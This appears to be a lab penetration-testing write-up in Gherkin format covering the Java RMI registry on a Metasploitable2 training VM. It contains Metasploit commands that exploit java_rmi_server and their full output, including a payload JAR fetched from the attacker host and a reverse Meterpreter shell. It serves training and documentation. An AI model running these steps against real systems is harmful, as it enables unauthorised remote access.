## Version 1.4.1
## language: en

Feature:
  TOE:
    metasploitable2
  Location:
    192.168.1.201:1099
  CWE:
    CWE-0928-OWASP-TOP-TEN
  Rule:
    REQ.142 Change system default credentials.
  Goal:
    Get shell on the remote machine
  Recommendation:
    Change system defaults settings and credentials.

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | ParrotSec       | 4.19.0      |
    | Nmap            | 7.70        |
    | Metasploit      | 5.0.4-dev   |
  TOE information:
    Given I am scanning the server 192.168.1.201
    And rmiregistry is open on port 1099
    And is running on Ubuntu 2.6.24

  Scenario: Normal use case
  The server can remotely invocate a java method
    Given I scan the server
    Then I can see that the port is open
    """
    PORT  STATE  SERVICE
    514/TCP open shell
    1099/TCP open rmiregistry
    1524/TCP open ingreslock
    """

  Scenario: Static detection
  No code given

  Scenario: Dynamic detection
  Java-rmi allows me to exploit and get access to the server
    Given the server is using a vulnerable java-rmi-server
    Then I can execute the following command:
    """
    nmap 192.168.1.201
    """
    Then I get the output:
    """
    PORT  STATE  SERVICE
    513/TCP open login
    514/TCP open shell
    1099/TCP open rmiregistry
    1524/TCP open ingreslock
    2049/TCP open nfs
    """
    Then I can conclude that java-rmi is open and running.

  Scenario: Exploitation
  In order to get in to the server we need to exploit the vulnerability.
    Given the server java-rmi-server is vulnerable
    And the server is using an outdated software.
    Then I can execute the following command:
    """
    msf5 > use exploit/multi/misc/java_rmi_server
    msf5 > set rhost 192.168.1.201
    msf5 > run
    """
    Then I get the output:
    """
    [*] Started reverse TCP handler on 192.168.1.200:4444
    [*] 192.168.1.201:1099 - Using URL: http:/0.0.0.0:8080/j73naRYDJX
    [*] 192.168.1.201:1099 - Local IP: http://192.168.1.200:8080/j73naRYDJX
    [*] 192.168.1.201:1099 - Server started.
    [*] 192.168.1.201:1099 - Sending RMI Header...
    [*] 192.168.1.201:1099 - Sending RMI Call...
    [*] 192.168.1.201:1099 - Replied to request for payload JAR
    [*] Sending stage (53845 bytes) to 192.168.1.201
    [*] Meterpreter session 1 opened (192.168.1.200:4444 -> 192.168.1.201:48072)
    [*] 192.168.1.201:1099 - Server stopped.

    meterpreter >
    """
    Then I can conclude that I got access to the server

  Scenario: Remediation
  No code given

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    10/10 (high) - AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  Temporal: Attributes that measure the exploit's popularity and fixability
    9.5/10 (high) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    9.5/10 (high) - CR:H/IR:H/AR:H/MAV:N/MAC:L/MPR:N/MUI:N/MS:C/MC:H/MI:H/MA:H